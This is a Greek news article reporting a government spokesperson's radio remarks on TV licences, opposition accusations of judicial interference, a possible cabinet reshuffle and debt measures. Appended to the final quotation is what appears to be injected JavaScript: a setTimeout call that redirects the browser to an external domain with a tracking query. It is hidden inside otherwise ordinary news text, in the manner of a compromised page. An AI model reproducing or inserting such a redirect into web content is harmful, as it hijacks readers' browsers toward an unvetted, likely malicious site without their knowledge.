Γεροβασίλη: ΝΔ και αντιπολίτευση να σταθούν στο ύψος των περιστάσεων για τις άδειες

0
8

 

«Καλούμε τη Νέα Δημοκρατία και την αντιπολίτευση να σταθούν επιτέλους στο ύψος των περιστάσεων. Είναι μια ευκαιρία να συμφιλιωθεί η Νέα Δημοκρατία με την πραγματικότητα» δήλωσε η κυβερνητική εκπρόσωπος, για τη στάση της αντιπολίτευσης στο θέμα των τηλεοπτικών αδειών, μιλώντας στον realfm 97.8.

Σε ερώτηση για τις κατηγορίες της αντιπολίτευσης προς την κυβέρνηση για «παρεμβάσεις» στη Δικαιοσύνη και στο Συμβούλιο της Επικρατείας, που εξετάζει τη συνταγματικότητα του νόμου για τις τηλεοπτικές άδειες, η κ. Γεροβασίλη απάντησε: «Η αντιπολίτευση και κυρίως η ΝΔ νομίζω ότι κρίνει εξ ιδίων τα αλλότρια. Εκεί οφείλεται και όλη η διάθεση της καταστροφολογίας, των παρεκτροπών της δημοκρατίας και του Συντάγματος εξαιτίας της κυβέρνησης του ΣΥΡΙΖΑ. Ολα αυτά είναι παραμύθια με δράκους. Ολοι ξέρουν πολύ καλά πότε συνέβαιναν αυτά και ποιοι προσπάθησαν να επηρεάσουν τη δικαιοσύνη».

Ερωτηθείσα για το τι ανασχηματισμός πρόκειται να γίνει, αν θα είναι διορθωτικός, δομικός, αν θα είναι ένας ανασχηματισμός με σοβαρές και μεγάλες αλλαγές ή θα είναι ένας ανασχηματισμός κατά τον οποίο θα αλλάξουν ένα – δύο πρόσωπα, η κ. Γεροβασίλη απάντησε:

«Καταρχήν δεν υπάρχει θέμα αυτή τη στιγμή ανοιχτό για το πώς και τι θα γίνει, και πότε, ο ανασχηματισμός. Ότι κάποια στιγμή θα γίνει ανασχηματισμός είναι βέβαιο, έχει αναγγελθεί και από τον Πρωθυπουργό και παλαιότερα ότι θα γίνει κάποια στιγμή και ότι όλοι είμαστε εδώ για να κριθούμε… Και βεβαίως κάποια στιγμή θα γίνει. Αυτό το οποίο λέω εγώ, είναι ότι δεν ξέρω πότε θα γίνει. Και επίσης κανένας ανασχηματισμός, για να μην μιλάμε με κοινοτοπίες, δεν έχει ανακοινωθεί από πριν όταν συμβαίνει. Εκτιμώ, ότι η ανάγκη είναι για έναν δομικό ανασχηματισμό».

Η υφυπουργός παρά τω Πρωθυπουργώ ανέφερε στη συνέχεια ότι σύντομα θα έχει νομοθετηθεί ο εξωδικαστικός μηχανισμός για τις υπερχρεωμένες επιχειρήσεις, σημειώνοντας:

«Το τέλος της χρονιάς θα μας βρει με λυμένα όλα αυτά τα ζητήματα, σε σχέση και με την προστασία της πρώτης κατοικία των ανθρώπων που πραγματικά αδυνατούν να αποπληρώσουν -δεν μιλάμε για τους κακοπληρωτές- και βεβαίως το μεγάλο θέμα των υπερχρεωμένων επιχειρήσεων που οφείλαμε και το είχαμε υποσχεθεί και το κάνουμε πράξη, να δοθεί η δεύτερη ευκαιρία «.

Στο ερώτημα αν ο Νίκος Χριστοδουλάκης αναλαμβάνει επικεφαλής της ομάδας για το χρέος, η ίδια απάντησε: «Έχω και εγώ και την πληροφορία ότι μάλλον θα είναι έτσι, αλλά δεν είμαι πολύ βέβαιη, πιθανότατα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here